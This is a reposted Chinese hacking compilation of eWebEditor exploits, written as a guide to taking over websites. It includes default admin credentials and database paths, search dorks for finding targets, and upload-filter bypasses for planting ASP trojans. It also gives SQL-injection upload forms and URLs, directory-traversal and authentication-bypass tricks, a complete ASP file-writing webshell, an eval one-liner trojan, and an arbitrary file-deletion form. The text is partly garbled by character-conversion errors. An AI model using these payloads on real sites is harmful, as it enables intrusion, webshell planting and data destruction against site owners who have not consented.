Ewebeditor最新漏洞及漏洞大全

Ewebeditor最新漏洞及漏洞大全[收集]javascript

來源:轉載做者:佚名時間:2009-06-03 00:04:26 php

下面文章收集轉載於網絡:) 算是比較全面的ewebeditor編輯器的漏洞收集,現在的站點大多數用的都是ewebeditor編輯器,html

因此ewebeditor漏洞的危害性仍是至關大的,作了一下漏洞收集,漏洞修補的方法可去網上查找。java

漏洞更新日期TM 2009 2 9轉自zake’S Blog
        ewebeditor
最新漏洞。這個程序爆漏洞通常都是直接上傳的漏洞,首先在本地搭建一個ASP環境重命名一個木馬名字好比:1.gif.asp這種就OK
那麼接下來完美本地搭建一個環境你可以用WEB小工具搭建一個,目的就是讓遠程上傳。http://127.0.0.1/1.gif.asp搭建好了,在官方的地方運行網絡地址而後肯定之後,web

 這裏是最關鍵的一部!shell


 這裏點了遠程上傳之後,再提交獲得木馬地址

由於官方在圖片文件夾作了限制致使不能運行ASP腳本而沒能拿到WEB權限。
屬於安全檢測漏洞版本號ewebeditor v6.0.0
數據庫

曾經的ewebeditor漏洞:數組

ewebeditor注入漏洞瀏覽器

你們都知道ewebeditor編輯器默認的數據庫路徑db/ewebeditor.mdb
默認後臺地址是admin_login.asp,另外存在遍歷文件夾漏洞,假設是asp後綴的數據庫還可以寫入一句話
今天我給你們帶來的也是ewebeditor編輯器的入侵方法
只是一種是注入,一種是利用upload.asp文件,本地構造
NO1
:注入
http://www.XXX.com/ewebeditor2007/ewebeditor.asp?id=article_content
&style=full_v200
編輯器ewebedior7曾經版本號統統存在注入
直接檢測不行的,要寫入特徵字符
咱們的工具是不知道ewebeditor的表名的還有列名
咱們本身去看看
哎。。先表吧
要先加入進庫
開始猜帳號password了
咱們==
心急的日後拉
出來了
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
對吧^_^
後面不說了
NO2
:利用upload.asp文件,本地構造上傳shell
你們看這裏
http://www.siqinci.com/ewebeditor2007/admin_style.asp?action=stylepreview
&id=37
假設碰見這種狀況又沒法加入工具欄是否是很是鬱悶
現在不鬱悶了,^_^源源不通常
咱們記錄下他的樣式名「aaa」
我已經吧upload.asp文件拿出來了
咱們構造下
OK
,我以前已經構造好了
事實上就是這裏
<form action=」
地址/path/upload.asp?action=save&type=&style=樣式名」 method=post name=myformenctype=」multipart/form-data」>
<input type=file name=uploadfile size=1 style=」width:100%」>
<input type=submit value=」
上傳了」></input>
</form>
如下咱們執行他上傳個大馬算了
UploadFile
上傳進去的在這個文件夾下
2008102018020762.asa
安全

過往漏洞:

首先介紹編輯器的一些默認特徵:
默認登錄admin_login.asp
默認數據庫db/ewebeditor.mdb
默認賬號admin passwordadminadmin888
搜索keyword:」inurl:ewebeditor」keyword十分重要
有人搜索」eWebEditor -eWebSoft在線編輯器
根本搜索不到幾個~
baidu.google
搜索inurl:ewebeditor
幾萬的站起碼有幾千個是具備默認特徵的~
那麼試一下默認後臺
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp

試默認賬號password登錄。
利用eWebEditor得到WebShell的步驟大體例如如下:
1
.肯定站點使用了eWebEditor。通常來講,咱們僅僅要注意發表帖子(文章)的頁面是否有相似作了記號的圖標,就可以大體作出推斷了。
2
.查看源碼,找到eWebEditor的路徑。點擊查看源碼,看看源碼中是否存在相似「<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>」的語句。事實上僅僅有發現了存在這種語句了,才幹夠真正肯定這個站點使用了eWebEditor。而後記下src=’***’中的「***」,這就是eWebEditor路徑。
3
.訪問eWebEditor的管理登陸頁面。eWebEditor的默認管理頁面爲admin_login.asp,和ewebeditor.asp在同一文件夾下。以上面的路徑爲例,咱們訪問的地址爲:http://www.***.net/edit/admin_login.asp,看看是否出現了登陸頁面。
假設沒有看到這種頁面,說明管理員已經刪除了管理登陸頁面,呵呵,還等什麼,走人啊,換個地方試試。只是通常來講,我很是少看到有哪一個管理員刪了這個頁面,試試默認的username:admin,password:admin888。怎麼樣?成功了吧(不是默認帳戶請看後文)!
4
.添加上傳文件類型。點擊樣式管理,隨便選擇列表中底下的某一個樣式的設置,爲何要選擇列表中底下的樣式?因爲eWebEditor自帶的樣式是不一樣意改動的,固然你也可以拷貝一個新的樣式來設置。
而後在上傳的文件類型中添加「asa」類型。
5
.上傳ASP木馬,得到WebShell。接下來將ASP木馬的擴展名改動爲asa,就可以簡單上傳你的ASP木馬了。不要問我怎麼上傳啊,看到預覽 了嗎?點擊預覽,而後選擇插入其餘文件的button就可以了。
漏洞原理
漏洞的利用原理很是easy,請看Upload.asp文件:
不論什麼狀況下都不一樣意上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), 「ASP」, 「」)
因爲eWebEditor只過濾了ASP文件。記得我第一次使用eWebEditor時就在納悶:既然做者已經知道asp文件需要過濾,爲何不一樣一時候過濾asacer等文件呢?或許這就是對免費用戶不負責任的表現吧!
高級應用
eWebEditor
的漏洞利用另外一些技巧:
1
.使用默認username和password沒法登陸。
請試試直接下載db文件夾下的ewebeditor.mdb文件,username和password在eWebEditor_System表中,通過了md5加密,假設沒法下載或者沒法破解,那就當本身的運氣很差了。
2
.加了asa類型後發現仍是沒法上傳。
應該是站長懂點代碼,本身改動了Upload.asp文件,但是沒有關係,依照常人的思惟習慣,每每會直接在sAllowExt = Replace(UCase(sAllowExt),「ASP」, 「」)一句上改動,我就看見過一個站長是這樣改動的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), 「ASP」,「」), 「CER」, 「」), 「ASA」, 「」), 「CDX」, 「」), 「HTR」, 「」)
猛一看什麼都過濾了,但是咱們僅僅要在上傳類型中添加「aaspsp」,就可以直接上傳asp文件了。呵呵,是否是天才的想法?「aaspsp」過濾了「asp」字符後,反而變成了「asp」!順便告訴你們一個祕密,事實上動網論壇7.0 sp2中也可以利用相似的方法繞過對擴展名的過濾。
3
.上傳了asp文件後,卻發現該文件夾沒有執行腳本的權限。
呵呵,真是好笨啊,上傳類型可以改,上傳路徑不是也可以改動的嗎?細緻看看圖四。
4
.已經使用了第2點中的方法,但是asp類型仍是沒法上傳。
看來站長確定是一個寫asp的高手,但是咱們還有最後一招來對付他:看到圖三中的遠程類型了嗎?eWebEditor能夠設定本身主動保存遠程文件的類型,咱們能夠增長asp類型。但是怎樣才幹讓遠程訪問的asp文件能夠以源代碼形式保存呢?方法是很是多的,最簡單的方法是將IIS中的應用文件映射中的「asp」刪除。
後記
依據本身的經驗,差點兒僅僅要能進入eWebEditor的後臺管理,基本上均可以得到WebShell。在Google上搜索「ewebeditor.asp?id=」能夠看到長達十多頁的相關信息,我大體抽查了當中幾個,發現成功率約爲50%。還不錯吧?oblg 2.52版曾經的版本號也是使用eWebEditor,可以去搜索幾個來練練手。要命的是eWebEditor的官方站點和幫助文件里根本沒有這方面的安全提示。還有,我發現官方提供的測試系統並不存在相似的漏洞,看來不是他們不知道,而是沒有把免費用戶的網絡安危放在心上!

 

 

 

 

eWebEditor=>2.8 商業版後臺一句話木馬利用

登錄後臺,點擊改動password---新password設置爲 1":evalrequest("a")

設置成功後,訪問asp/config.asp文件就能夠,一句話木馬被寫入到這個文件中面了.  

 

 

 

 

ewebeditor漏洞利用總結

     先從最主要的記錄起!一般入侵ewebeditor編輯器的過程例如如下:

1、首先訪問默認管理頁看是否存在。

       默認管理頁地址2.80曾經爲 ewebeditor/admin_login.asp 之後版本號爲admin/login.asp (各類語言的你們本身改後綴,本文就以asp來進行說明,如下再也不細說了!)

2、默認管理賬號password!

       默認管理頁存在!咱們就用賬號password登錄!默認賬號password爲: admin admin888 !常用的password還有admin admin999 admin1 admin000 之類的。

3、默認數據庫地址。

       假設password不是默認的。咱們就訪問是否是默認數據庫!嘗試下載數據庫獲得管理員password!管理員的賬號password,都在eWebEditor_System表段裏,sys_UserName Sys_UserPass 都是md5加密的。獲得了加密password。可以去www.cmd5.com www.xmd5.org 等站點進行查詢!暴力這活很久不幹了!也可以丟國外一些可以跑password的站點去跑!

       默認數據庫路徑爲:ewebeditor/db/ewebeditor.mdb 常用數據庫路徑爲:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.aspewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.asp ewebeditor/db/ewebeditor1033.mdb

       很是多管理員常改.asp後綴,通常訪問.asp .asa 後綴的都是亂碼!可以用下載工具下載下來,而後更改後綴爲.mdb 來查看內容!

4、說說漏洞基本利用步驟,還以asp爲例!

       登錄後臺之後。選擇樣式管理,默認編輯器的默認樣式都不可以改動的。咱們可以從隨意樣式新建一個樣式,而後在圖片上傳加入可上傳後綴。.asa .cer .cdx 等!.asp 過濾過了。但是咱們可以用.asaspp後綴來加入,這樣上傳文件正好被ewebeditor 吃掉asp後綴,剩下.asp 呵呵!代碼不具體說了。總之是個很是好笑的過濾!相同,假設遇到一個管理員有安全意識的,從代碼裏,把.asp .asa .cer .cdx 都全然禁止了,咱們也可以用.asasaa 後綴來突破。加入完了後綴,可以在樣式管理,點擊預覽,而後上傳!

5、默認管理頁不存在!

       在實際入侵過程當中,有很是多默認的管理頁不存在的時候。咱們可以直接訪問樣式管理頁面 ewebeditor/admin_style.asp 而後用第4步的方式拿webshell。假設樣式管理頁也不存在的話,咱們可以看數據庫內的樣式表(ewebeditor_style)裏面有沒有比咱們先進去的朋友留下的樣式。而後構造上傳!詳細url例如如下:eWebEditor/ewebeditor.asp?id=content&style=www 紅色部分是咱們發現被改動加入了asa後綴的樣式名,你們自行改動!

6ewebeditor的幾個版本號存在注入!

       ewebeditor 曾經版本號都存在注入 ewebeditor/ewebeditor.asp?id=article_content&style=Full_v200 !

加入驗證字符串,和管理員字段可以跑出管理員的md5加密password!

      ewebeditor v2.1.6存在注入,可以用union select 加入上傳後綴進行上傳!先貼漏洞利用方式!

--------------------------------------------------------------------------------------------------------------

<H3>ewebeditor asp 2.1.6上傳漏洞利用程序----</H3><br><br>

<form action="http://www.xxx.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrlfrom ewebeditor_style where s_name='standard'and'a'='a" method=postname=myform enctype="multipart/form-data">

<input type=file name=uploadfilesize=100><br><br>

<input type=submit value=Fuck>

</form>

--------------------------------------------------------------------------------------------------------------

       以上代碼令存爲html!改動紅色部分的路徑,而後本身主動上傳 .cer 文件!漏洞緣由是因爲sStyleName變量直接從style中讀取,並無過濾,因此可以包括隨意字符!用selectewebeditor_style表中查找s_namesStyleName的記錄,找不到就提示出錯!在sStyleName變量中用union來構造記錄,咱們可以在sAllowExt中增長"|cer""|asa"等!

       另外另外一些版本號的ewebeditorupload.asp文件存在注入漏洞!貼幾個注入用的url!信息錯誤則返回腳本出錯的提示,在瀏覽器左下角!詳細利用例如如下:

ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1

注意改動紅色部分的字段名、位數、ascii碼的值!

7、文件夾遍歷漏洞!

       這裏大概說一下!文件夾遍歷漏洞基本存在於ewebeditor/admin_uploadfile.asp 高版本號的是ewebeditor/admin/upload.asp 文件!這個文件有的不需要登錄驗證,有些需要!很是多有經驗的管理員會把編輯器的文件夾設置爲僅僅讀權限,不可改動!這樣的狀況下,惟一可以利用的也就是利用遍歷文件夾功能查看站點文件,比方數據庫路徑、後臺地址、其它的上傳地址、最直觀的就是別人留下的小馬等等!這些都自由發揮了!說下漏洞利用方法!

       漏洞利用方式例如如下:在上傳文件管理頁面隨便選擇一個上傳樣式!比方ewebeditor/admin_uploadfile.asp?id=14 id後面加入&dir=../..

相似例如如下:webeditor/admin_uploadfile.asp?id=14&dir=../../../../data/可以看到站點數據庫的路徑!

      另一個遍歷文件夾的漏洞文件是ewebeditor/asp/browse.asp

漏洞代碼爲:

Function GetList()

Dim s_List, s_Url

s_List = ""

Dim oFSO, oUploadFolder, oUploadFiles,oUploadFile, sFileName

'Response.Write sCurrDir

'On Error Resume Next

Set oFSO =Server.CreateObject("Scripting.FileSystemObject")

Set oUploadFolder =oFSO.GetFolder(Server.MapPath(sCurrDir))

'注意一下sCurrDir變量,這個值等下咱們可以用到

If Err.Number>0 Then

s_List = ""

Exit Function

End If

 

If sDir <> "" Then

If InstrRev(sDir, "/") > 1Then

s_Url= Left(sDir, InstrRev(sDir,"/") - 1)

Else

s_Url = ""

End If

 

s_List = s_List & "" & _

"" & _

".." & _

" " & _

""

End If

'Response.WritesDir&"!"&s_List

 

Dim oSubFolder

For Each oSubFolder InoUploadFolder.SubFolders

'Response.Write oUploadFolder.SubFolders

If sDir = "" Then

s_Url = oSubFolder.Name

Else

s_Url = sDir & "/" &oSubFolder.Name

End If

s_List = s_List & "" & _

"" & _

"" & oSubFolder.Name &"" & _

" " & _

""

Next

'Response.Write s_List

 

Set oUploadFiles = oUploadFolder.Files

 

For Each oUploadFile In oUploadFiles

'Response.Write oUploadFile.Name

sFileName = oUploadFile.Name

If CheckValidExt(sFileName) = True Then

'這行讓人有點鬱悶,檢測了所有贊成的文件後綴,如不一樣意就沒法列出,否則就不只僅列出文件夾名和圖片文件了

If sDir = "" Then

s_Url = sContentPath & sFileName

Else

s_Url = sContentPath & sDir &"/" & sFileName

End If

 

s_List = s_List & "" & _

"" & FileName2Pic(sFileName)& "" & _

"" & sFileName &"" & _

"" &GetSizeUnit(oUploadFile.size) & "" & _

""

End If

Next

Set oUploadFolder = Nothing

Set oUploadFiles = Nothing

'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url

 

If sDir = "" Then

s_Url = ""

's_Url = "/"

Else

s_Url = "/" & sDir &""

's_Url = "/" & sDir &"/"

End If

 

s_List = s_List & ""

s_List = HTML2JS(s_List)

'Response.WriteServer.HTMLEncode(s_List)&"!"&s_Url

s_List = "parent.setDirList("""& s_List & """, """ & s_Url &""")"

GetList = s_List

End Function

'假設沒有如下這步檢測的話,應該就可以列出文件夾中所有的文件了,有點鬱悶..現在僅僅能列出贊成後綴的文件和文件夾名

Function CheckValidExt(s_FileName)

If sAllowExt = "" Then

CheckValidExt = True

Exit Function

End If

 

Dim i, aExt, sExt

sExt = LCase(Mid(s_FileName,InStrRev(s_FileName, ".") + 1))

CheckValidExt = False

aExt = Split(LCase(sAllowExt), "|")

For i = 0 To UBound(aExt)

If aExt(i) = sExt Then

CheckValidExt = True

Exit Function

End If

Next

End Function

'咱們順着代碼往下找,發現sCurrDir的值是經過如下的值獲得的

Sub InitParam()

sType =UCase(Trim(Request.QueryString("type")))

sStyleName =Trim(Request.QueryString("style"))

 

Dim i, aStyleConfig, bValidStyle

bValidStyle = False

For i = 1 To Ubound(aStyle)

aStyleConfig = Split(aStyle(i),"|||")

If Lcase(sStyleName) =Lcase(aStyleConfig(0)) Then

bValidStyle = True

Exit For

End If

Next

 

If bValidStyle = False Then

OutScript("alert('InvalidStyle.')")

End If

 

sBaseUrl = aStyleConfig(19)

'nAllowBrowse = CLng(aStyleConfig(43))

nAllowBrowse = 1

 

If nAllowBrowse <> 1 Then

OutScript("alert('Do not allowbrowse!')")

End If

 

sUploadDir = aStyleConfig(3)

If Left(sUploadDir, 1) <>"/" Then

Select Case sType

Case "REMOTE"

sUploadDir = "../../" &sUploadDir & "Image/"

Case "FILE"

sUploadDir = "../../" &sUploadDir & "Other/"

Case "MEDIA"

sUploadDir = "../../" &sUploadDir & "Media/"

Case "FLASH"

sUploadDir = "../../" &sUploadDir & "Flash/"

Case Else

sUploadDir = "../../" &sUploadDir & "Image/"

End Select

End If

'sUploadDir =sUploadDir &"/"

 

Select Case sBaseUrl

Case "0"

'sContentPath = aStyleConfig(23)

Select Case sType

Case "REMOTE"

sContentPath = "../" &aStyleConfig(3) & "Image/"

Case "FILE"

sContentPath = "../" &aStyleConfig(3) & "Other/"

Case "MEDIA"

sContentPath = "../" &aStyleConfig(3) & "Media/"

Case "FLASH"

sContentPath = "../" &aStyleConfig(3) & "Flash/"

Case Else

sContentPath = "../" &aStyleConfig(3) & "Image/"

End Select

Case "1"

sContentPath =RelativePath2RootPath(sUploadDir)

Case "2"

sContentPath =RootPath2DomainPath(RelativePath2RootPath(sUploadDir))

End Select

 

Select Case sType

Case "REMOTE"

sAllowExt = aStyleConfig(10)

Case "FILE"

sAllowExt = aStyleConfig(6)

Case "MEDIA"

sAllowExt = aStyleConfig(9)

Case "FLASH"

sAllowExt = aStyleConfig(7)

Case Else

sAllowExt = aStyleConfig(8)

End Select

 

sCurrDir = sUploadDir '注意這裏,這個是獲得了配置的路徑地址

sDir = Trim(Request("dir")) '獲得dir變量

sDir = Replace(sDir, "\","/") 'dir變量進行過濾

sDir = Replace(sDir, "../","")

sDir = Replace(sDir, "./","")

If sDir <> "" Then

If CheckValidDir(Server.Mappath(sUploadDir& sDir)) = True Then

sCurrDir = sUploadDir & sDir &"/"

'重點就在這裏了,看到沒有,sUploadDir & sDir存在的時候,sCurrDir就爲sUploadDir & sDir的值了

'儘管上面對sDir進行了過濾,只是咱們全然可以跳過.詳細利用如下的利用中給出

Else

sDir = ""

End If

End If

End Sub

利用方式例如如下:

http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin

這樣子就可以看到admin的內容了。構造特殊的dir繞過上面的驗證!頁面空白的時候查看源碼,就可以看到文件夾列表了!

8session欺騙漏洞!

       適用於一些設置不當的虛擬主機。當旁註獲得一個webshell,而目標站存在ewebeditor卻不能找到password的時候可以嘗試欺騙進入後臺!順序例如如下:

         新建一個.asp文件,內容例如如下:<%Session("eWebEditor_User") = "123132323"%> 而後訪問這個文件,再訪問ewebeditor/admin_default.asp!欺騙進入後臺!只是很是老了!

9、後臺跳過認證漏洞!

       訪問後臺登錄頁面!隨便輸入賬號password,返回錯誤!而後清空瀏覽器,在地址欄輸入

javascript:alert(document.cookie="adminuser="+escape("admin"));

javascript:alert(document.cookie="adminpass="+escape("admin"));

javascript:alert(document.cookie="admindj="+escape("1"));

        而後再清空地址欄,在路徑裏輸入後臺登錄後的頁面,比方: admin_default.asp admin/default.asp 等。直接進入後臺,利用方式見上文!

10、利用遠程上傳功能!

       比方s_full樣式就存在這個功能,打開編輯頁面,而後圖片,選擇輸入url 比方:http://site.com/1.gif.asp ! 而後選擇上傳遠程文件!本身主動就把1.gif.asp 保存在上傳文件夾內!注:網上的東西大部分傳來傳去,這個辦法愚弄本身還成!文件的確顯示後綴爲.asp但是不能訪問,因爲收集過來的時候本身主動截止在1.gif了因此後面的.asp等於沒有!而且gif的內容就是咱們這個url的路徑!呵呵,後來又看到一個利用方式!是利用遠程蒐集的時候運行,咱們文件的代碼生成另外的小馬!

       利用代碼例如如下:

首先創建1.gif.asp 代碼例如如下

<%

Set fs =CreateObject("Scripting.FileSystemObject")

SetMyTextStream=fs.OpenTextFile(server.MapPath("\akteam.asp"),1,false,0)

Thetext=MyTextStream.ReadAll

response.write thetext

%>

在咱們的1.gif.asp的同文件夾下創建一個akteam.asp文件,內容就是咱們的小馬:

<%on error resume next%>

<%ofso="scripting.filesystemobject"%>

<%set fso=server.createobject(ofso)%>

<%path=request("path")%>

<%if path<>"" then%>

<%data=request("dama")%>

<%setdama=fso.createtextfile(path,true)%>

<%dama.write data%>

<%if err=0 then%>

<%="success"%>

<%else%>

<%="false"%>

<%end if%>

<%err.clear%>

<%end if%>

<%dama.close%>

<%set dama=nothing%>

<%set fos=nothing%>

<%="<form action=''method=post>"%>

<%="<input type=textname=path>"%>

<%="<br>"%>

<%=server.mappath(request.servervariables("script_name"))%>

<%="<br>"%>

<%=""%>

<%="<textarea name=dama cols=50rows=10 width=30></textarea>"%>

<%="<br>"%>

<%="<input type=submitvalue=save>"%>

<%="</form>"%>

利用上面說的遠程上傳的方式!可以獲得webshell!成功率取決於,虛擬主機的安全設置!

11、隨意文件刪除漏洞!

       此漏洞存在於Example\NewsSystem文件夾下的delete.asp文件裏,這是ewebeditor的測試頁面,無須登錄可以直接進入!看代碼

' 把帶"|"的字符串轉爲數組

Dim aSavePathFileName

aSavePathFileName = Split(sSavePathFileName, "|")

' 刪除新聞相關的文件,從目錄中

Dim i

For i = 0 To UBound(aSavePathFileName)

' 按路徑文件名稱刪除文件

Call DoDelFile(aSavePathFileName(i))

Next

aSavePathFileName是前面從數據庫取出來的:

sSavePathFileName =oRs("D_SavePathFileName")

看看D_SavePathFileName是怎麼加入到數據庫裏的,在addsave.asp(modifysave.asp)裏:sSavePathFileName =GetSafeStr(Request.Form("d_savepathfilename"))

...

oRs("D_SavePathFileName") =sSavePathFileName

 

居然過濾了,是GetSafeStr函數,再看看這個函數,在Startup.asp裏:

Function GetSafeStr(str)

GetSafeStr =Replace(Replace(Replace(Trim(str), "'", ""), Chr(34),""), ";", "")

End Function

       既然路徑沒有過濾,那就可以直接定義了,構造一個提交頁面,當中d_savepathfilename本身隨意賦值(要刪除多個文件,用|隔開就能夠)。試試../../eWebEditor.asp,提交後刪除該新聞,因而主文件夾下的eWebEditor.asp不見了!漏洞利用:

<HTML><HEAD><TITLE>eWebEditor刪除文件 byldjun(>

新聞列表%20|%20添加新聞

添加新聞

http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"

method="post"name="myform">

   <input type=hidden name=d_originalfilename>

   <input type=hidden name=d_savefilename>

   <table cellspacing=3 align=center>

<tr><td>要刪的文件(相對路徑就可以了)</td>

<td><input type="text"name="d_savepathfilename" value=""size="90"></td>

</tr>

<tr><td>新聞標題(隨便填)</td>

<td><input type="text"name="d_title" value="" size="90"></td>

</tr>

<tr><td>標題圖片:</td>

<td><selectname="d_picture" size=1><option value=''></option></select>

當編輯區有插入圖片時,將本身主動填充此下拉框</td>

</tr>

<tr><td>新聞內容(隨便填)</td>

<td><textareaname="d_content"></textarea></td>

</tr>

</table>

<input type=submit name=btnSubmitvalue=" 提交 ">

<input type=reset name=btnResetvalue=" 重填 ">

</form>

</BODY></HTML>

刪除文件漏洞一般是配合其它漏洞使用的,比方文件夾遍歷

<a href='list.asp'>中的list.asp地址要改動

<a href='add.asp'>中的add.asp地址要改動

<formaction="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"

(http://127.0.0.1/editor/Example/NewsSystem/addsave.asp地址要改動)

       另一個簡單利用方式:

<formaction="http://www.xxxbing.com/editor/example/newssystem/addsave.asp"method="post">

<input type=hiddenname=d_originalfilename value="x">

<input type=hidden name=d_savefilenamevalue="x">

要刪除的文件(相對路徑,多個文件用「|」隔開)<br>

<input type=textname=d_savepathfilename>

<input type=hiddenname="d_title" value="x">

<input type=hiddenname="d_picture" value="x">

<textareaname="d_content">x</textarea>

<input type=submit name=btnSubmitvalue="submit">

</form>

 

而後獲得返回的新聞ID再提交:http://www.XXXXX.com/editor/example/newssystem/delete.asp?id=[id]

       有幾個版本號的ewebeditor上傳類型是在security.asp 文件控制的!直接刪除該文件可以上傳隨意webshell

12、其它!

       其它說點什麼呢!以上的辦法都是本人經驗和網上搜集!臨時就想到這些了,之後想到了再補全!說說aspxphp jsp版本號的利用吧!

ASPX版:

受影響文件:eWebEditorNet/upload.aspx

利用方法:添好本地的cerShell文件。在瀏覽器地址欄輸入javascript:lbtnUpload.click();就能獲得shell。嘿嘿....繞過了限制......成功的上傳了ASPX文件....文件默認的上傳後保存的地址是eWebEditorNet/UploadFile/現在來看看是否上傳成功.....

PHP版本號:PhP版本號和asp版本號利用方式相似!只是php權限較高,很少廢話了!

jsp版本號:網上有很是多jsp的版本號,根本沒有對上傳文件類型進行檢測!需要注意的是jsp版本號的沒有上傳button!直接選擇文件,回車就可以提交了!

 

 

安腳本分主要有4個版本號,ASP/ASPX/PHP/JSP 每個版本號都有可以利用的漏洞。

 

安全漏洞

管理員未對編輯器的數據庫路徑和名稱進行改動,致使可以利用編輯器默認路徑直接對站點數據庫進行下載。

管理員未對編輯器的用戶登陸路徑進行改動,致使黑客可以利用站點數據庫所得到的username和password直接登錄編輯器管理後臺。

 

ASP

重要文件的名稱和路徑

Admin_login.asp

Admin_default.asp

Admin_style.asp

Admin_uploadfile.asp

Upload.asp

Admin_modipwd.asp

eWebEditor.asp

db/ewebeditor.mdb

 

通常用這個的默認後臺的URL都是默認的

www.***.com/admin/ewebeditor/login_admin.asp

www.***.com/ewebeditor/login_admin.asp

www.***.com/admin/eweb/login_admin.asp

www.***.com/admin/editor/login_admin.asp

 

下載數據庫

還有假設默認的帳戶和password改動了,咱們可以下載他們的數據庫,而後本地破解MD5

默認數據庫…/db/ewebeditor.mdb  或者。../db/ewebeditor.asp

 

登陸後臺後,點擊樣式管理,隨便選擇一個樣式,自帶的樣式不能改動的。

拷貝一個樣式,在其餘類型中添加,asa類型,接下來把免殺的asp木馬的後綴名改爲asa,返回管理首頁,點擊預覽,而後選擇插入其餘文件的button進行asp木馬的上傳,上傳的ASP木馬就在,UploadFILE目錄裏。

 

假設加了asa類型後發現仍是沒法上傳。應該是站長懂點代碼,本身改動了Upload.asp文件,但是沒有關係,依照常人的思惟習慣,每每直接在sAllowExt =Replace(UCase(sAllowExt),」asp」,」」)一句上改動。

但是咱們僅僅要在上傳類型中添加「aaspsp,就可以傳asp文件了,

假設上述兩種方法都失敗了,則利用eWebEditor能夠設定本身主動保存遠程文件的類型,咱們能夠增長asp類型。但是怎樣才幹讓遠程訪問的asp文件能夠以源代碼形式保存呢?方法是很是多的,最簡單的方法是將IIS中的應用文件映射中的ASP刪除。

有的站數據庫設置了僅僅讀屬性,這種站你是沒法新加樣式的,這種站你可以看他數據庫裏的樣式設置狀況,通常很是多時候都是讓人給拿過的,而且明顯的asa在那裏。這種話就可以直接構造一個調用這個樣式的鏈接來上傳shell.

比方發現數據庫裏有樣式123他設置的是可以上傳asa的話,那麼就可以這樣調用:http://www.***.com/eweb/ewebeditor.asp?id=contentCN&style=123

這樣就可以直接上傳了,而後在點編輯就會找到shell的路徑了。事實上這個漏洞主要是upload.asp的過濾不嚴形成的,新版的應該都修復了,詳細愛影響的版本號我也沒統計過。

遍歷路徑

Ewebeditor遍歷路徑漏洞,當數據庫僅僅讀的時候,ewebeditor/admin_uploadfile.asp?id=14id=14後面加入&dir=再加&dir=/&dir=http://www.****.com// 看到整個站點文件了,只是此項測試的時候發現,僅僅有登陸成功才幹進行操做。

Cookie漏洞

漏洞文件:admin_private.asp

漏洞語句:

<% if session (「eWebEditor_User」) = 「」Then

Response.Redirect 「admin_login.asp」

Response.End

End If

僅僅推斷了session,沒有推斷cookies和路徑的驗證問題。

漏洞利用:

新建一個mrchen.asp內容例如如下:

<%Session (「eWebEditor_User」) =」11111111」%>

訪問mrchen.asp,再訪問後臺不論什麼文件,forexample:Admin_Default.asp這個拿shell的方法就簡單了。

相關文章
相關標籤/搜索